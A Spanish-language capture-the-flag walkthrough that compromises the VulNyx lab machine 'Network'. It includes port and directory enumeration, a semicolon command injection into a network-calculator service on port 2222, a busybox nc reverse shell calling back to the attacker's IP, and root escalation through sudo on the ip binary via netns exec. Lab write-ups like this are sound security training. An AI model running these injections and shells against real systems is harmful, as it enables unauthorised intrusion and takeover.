Information

Network es una VM Linux de dificultad baja de la plataforma VulNyx, fue creada por el usuario d4t4s3c y funciona correctamente en los hipervisores VirtualBox y VMware.


Enumeration

Nmap

TCP

root@kali:~  nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.146
Starting Nmap 7.99 ( https://nmap.org ) at 2026-08-15 11:31 +0200
Nmap scan report for 192.168.1.146
Host is up (0.0012s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
2222/tcp open  EtherNetIP-1
8080/tcp open  http-proxy
root@kali:~  nmap -sVC -p22,80,2222,8080 192.168.1.146
Starting Nmap 7.99 ( https://nmap.org ) at 2026-08-15 11:32 +0200
Nmap scan report for 192.168.1.146
Host is up (0.00031s latency).

PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH 8.4p1 Debian 5+deb11u7 (protocol 2.0)
| ssh-hostkey: 
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp   open  http          Apache httpd 2.4.67 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.67 (Debian)
2222/tcp open  EtherNetIP-1?
| fingerprint-strings: 
|   GenericLines: 
|     [93m[i] 
|     [97mEnter an IPv4 address to retrieve network information (e.g. 10.10.10.10):
|     [92m 
|     [94m[*] 
|     [97mRetrieving network information for: 
|     [92m
|     [92m
|     [91m
|     INVALID ADDRESS: 
|     [92m
|     [92m[+] 
|     [97mNetwork information retrieved successfully.
|   NULL: 
|     [93m[i] 
|     [97mEnter an IPv4 address to retrieve network information (e.g. 10.10.10.10):
|_    [92m
8080/tcp open  http          Apache httpd 2.4.67 ((Debian))
|_http-server-header: Apache/2.4.67 (Debian)
|_http-title: Apache2 Debian Default Page: It works
|_http-open-proxy: Proxy might be redirecting requests
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port2222-TCP:V=7.99%I=7%D=8/15%Time=6A80322B%P=x86_64-pc-linux-gnu%r(NU
SF:LL,5E,"\n\x1b\[93m\[i\]\x20\x1b\[97mEnter\x20an\x20IPv4\x20address\x20t
SF:o\x20retrieve\x20network\x20information\x20\(e\.g\.\x2010\.10\.10\.10\)
SF::\x1b\[92m\x20")%r(GenericLines,327,"\n\x1b\[93m\[i\]\x20\x1b\[97mEnter
SF:\x20an\x20IPv4\x20address\x20to\x20retrieve\x20network\x20information\x
SF:20\(e\.g\.\x2010\.10\.10\.10\):\x1b\[92m\x20\x1b\[94m\[\*\]\x20\x1b\[97
SF:mRetrieving\x20network\x20information\x20for:\x20\x1b\[92m\r\.\.\.\x1b\
SF:[0m\n\x1b\[92m\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\
SF:x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94
SF:\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x9
SF:4\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x
SF:94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\
SF:x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2
SF:\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe
SF:2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\x
SF:e2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\
SF:xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80
SF:\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x8
SF:0\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x
SF:80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\
SF:x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94
SF:\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x9
SF:4\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\x1b\[91m\nINVALID\x20ADDRESS:
SF:\x20\r\n\n\x1b\[92m\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2
SF:\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe
SF:2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\x
SF:e2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\
SF:xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80
SF:\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x8
SF:0\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x
SF:80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\
SF:x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94
SF:\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x9
SF:4\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x
SF:94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\
SF:x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2
SF:\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe
SF:2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\x
SF:e2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\x1b\[0m\n\x1b\[92m\[\+\]
SF:\x20\x1b\[97mNetwork\x20information\x20retrieved\x20successfully\.\x1b\
SF:[0m\n");

Shell (net)

80/TCP (HTTP)

Site

Directory Brute Force
root@kali:~  gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.146/ -x html,txt,php
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.146/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8.2
[+] Extensions:              html,txt,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
index.html           (Status: 200) [Size: 10701]
Progress: 882176 / 882176 (100.00%)
===============================================================
Finished
===============================================================

8080/TCP (HTTP)

Site

Directory Brute Force
root@kali:~  gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.146:8080/ -x html,txt,php
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.146:8080/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8.2
[+] Extensions:              html,txt,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
index.html           (Status: 200) [Size: 10701]
Progress: 882176 / 882176 (100.00%)
===============================================================
Finished
===============================================================

2222/TCP (UNKNOWN)

Al conectarme con nc al puerto, veo un aplicativo que solicita una IP para calcular la red de esta.

root@kali:~  nc 192.168.1.146 2222

[i] Enter an IPv4 address to retrieve network information (e.g. 10.10.10.10): 192.168.1.2
[*] Retrieving network information for: 192.168.1.2...
───────────────────────────────────────────────────────────────────────────────────────────
Address:   192.168.1.2          11000000.10101000.00000001. 00000010
Netmask:   255.255.255.0 = 24   11111111.11111111.11111111. 00000000
Wildcard:  0.0.0.255            00000000.00000000.00000000. 11111111
=>
Network:   192.168.1.0/24       11000000.10101000.00000001. 00000000
HostMin:   192.168.1.1          11000000.10101000.00000001. 00000001
HostMax:   192.168.1.254        11000000.10101000.00000001. 11111110
Broadcast: 192.168.1.255        11000000.10101000.00000001. 11111111
Hosts/Net: 254                   Class C, Private Internet

───────────────────────────────────────────────────────────────────────────────────────────
[+] Network information retrieved successfully.

(Por el formato del output, parece ser la salida del comando ipcalc)

Command Injection

RCE

Consigo ejecutar comandos como usuario net.

root@kali:~  echo ";id" | nc 192.168.1.146 2222 | tail -n3
uid=1000(net) gid=1000(net) grupos=1000(net)
───────────────────────────────────────────────────────────────────────────────────────────
[+] Network information retrieved successfully.
Reverse Shell

Ya ejecutando comandos trato de obtener una reverse shell.

root@kali:~  echo ";busybox nc 192.168.1.5 443 -e /bin/sh" | nc 192.168.1.146 2222

Obtengo la shell como usuario net.

root@kali:~  nc -lvnp 443     
listening on [any] 443 ...
connect to [192.168.1.5] from (UNKNOWN) [192.168.1.146] 47680
id ; hostname
uid=1000(net) gid=1000(net) grupos=1000(net)
network

Privilege Escalation

Enumeration

Sudo

El usuario net puede ejecutar como root el binario ip con sudo.

net@network:~$ sudo -l
Matching Defaults entries for net on network:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User net may run the following commands on network:
    (root) NOPASSWD: /usr/bin/ip

Abuse

Binary (ip)

En GTFOBins nos dan la secuencia de shell-escape y me convierto en usuario root.

net@network:~$ sudo -u root /usr/bin/ip netns add foo
net@network:~$ sudo -u root /usr/bin/ip netns exec foo /bin/sh
# id ; hostname
uid=0(root) gid=0(root) grupos=0(root)
network
# bash -i
root@network:/home/net#

Flags

Ya como usuario root puedo leer las flags user.txt y root.txt.

root@network:~# find / -name user.txt -o -name root.txt 2>/dev/null |xargs cat
688*****************************
ed5*****************************

Hasta aquí la resolución de la máquina Network de VulNyx.

Happy Hacking! 🙂